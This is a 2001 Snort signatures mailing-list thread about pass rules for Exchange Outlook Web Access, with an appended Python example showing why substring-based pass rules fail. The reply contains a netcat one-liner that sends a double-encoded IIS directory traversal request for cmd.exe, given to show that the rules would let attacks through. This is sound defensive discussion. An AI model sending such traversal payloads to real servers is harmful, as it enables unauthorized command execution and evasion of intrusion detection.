[Snort-sigs] Exchange OWA Pass Rules

Joao Gouveia jgouveia at ...111...
Thu Oct 25 03:10:10 EDT 2001


echo 'GET /exchweb/../scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe' | netcat your.host.com 80
This will get "passed" on snort.
Of course no one is supposed to know how your rules are configured but
still...

Regards,

Joao Gouveia


----- Original Message -----
From: "Cessna, Michael" <MCessna at ...153...>
To: <snort-sigs at lists.sourceforge.net>
Sent: Wednesday, October 24, 2001 8:57 PM
Subject: [Snort-sigs] Exchange OWA Pass Rules


> Here's a copy of the rules that keep MS Exchange OWA from driving you nuts
> with alerts. Since OWA runs on MS IIS......Be careful to make sure that the
> OWA server is FULLY patched!
>
>
> ##############################################################################
> #Pass Rules for Exchange Outlook Web Access
> #
> #First a new variable needs to be set in your snort.conf file
> #to define the OWA servers
> #var OWA_SERVERS 192.168.1.1/32
> #or for multiple OWA servers
> #var OWA_SERVERS [192.168.1.1/32,192.168.2.2/32]
> #using the OWA_SERVERS variable lets you pass the packets destined for your OWA
> #servers while keeping the regular rules to protect your other nodes
> #Make sure that you use the -o switch so that Snort processes the pass
> #rules before the other rules
> #
> #NOTE: These rules are for OWA and Exchange on the same box.
> #I have tested the rules with Exchange 5.5sp4 and Exchange2000
> #MS IIS 5.0 was used as the webserver for both 5.5 and 2k
> #If I get some time I'll try to separate out the webserver from Exchange
> #And see if the rules need to be changed.
> #Please send any changes/updates/
> pass tcp $EXTERNAL_NET any -> $OWA_SERVERS 80 (msg:"WEB-MISC webdav search access by Exchange OWA"; flags: A+; uricontent: "/exchange"; nocase;)
> pass tcp $EXTERNAL_NET any -> $OWA_SERVERS 80 (msg:"WEB-CGI Calendar access by Exchange OWA"; flags: A+; uricontent: "/exchweb"; nocase;)
>
> Michael Cessna
> Network Engineer
> RealTime Media
> 308 Lancaster Ave.
> Wynnewood, PA 19096
> p.610-896-9400 x308
> f.610-896-9416
> mcessna at ...153...
> www.realtimemedia.com
> www.rtm.com
>
>
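
Added example, not part of the original thread: a Python model of why a pass rule keyed on a URI substring also passes the request shown in the reply, next to a check that decodes and normalizes the path first. The function names and the benign sample paths are constructed for illustration, and the substring match is an assumed simplification of how the posted rules behave.

```python
import posixpath
from urllib.parse import unquote

# uricontent values taken from the two pass rules quoted above
PASS_PREFIXES = ("/exchange", "/exchweb")

def naive_pass(uri):
    """Assumed model of the posted rules: case-insensitive substring match on the raw URI."""
    lowered = uri.lower()
    return any(prefix in lowered for prefix in PASS_PREFIXES)

def decode(uri, max_rounds=5):
    """Drop the query, percent-decode until stable (handles %255c), unify slashes."""
    path = uri.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def normalize(uri):
    """Resolve dot segments to approximate the path the request finally refers to."""
    path = "/" + decode(uri).lstrip("/")
    return posixpath.normpath(path).lower()

def strict_pass(uri):
    """Pass only if the decoded path has no '..' segment and stays under an OWA prefix."""
    if ".." in decode(uri).split("/"):
        return False
    path = normalize(uri)
    return any(path == p or path.startswith(p + "/") for p in PASS_PREFIXES)

# First entry is the request from the reply above; the others are constructed samples.
SAMPLES = [
    "/exchweb/../scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe",
    "/exchange/user/Inbox/",
    "/EXCHWEB/img/logo.gif",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(f"naive={naive_pass(uri)!s:5} strict={strict_pass(uri)!s:5} "
              f"normalized={normalize(uri)}  raw={uri}")
```

Only requests for which `strict_pass` is true are candidates for a pass rule; anything else should still reach the regular alert rules.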




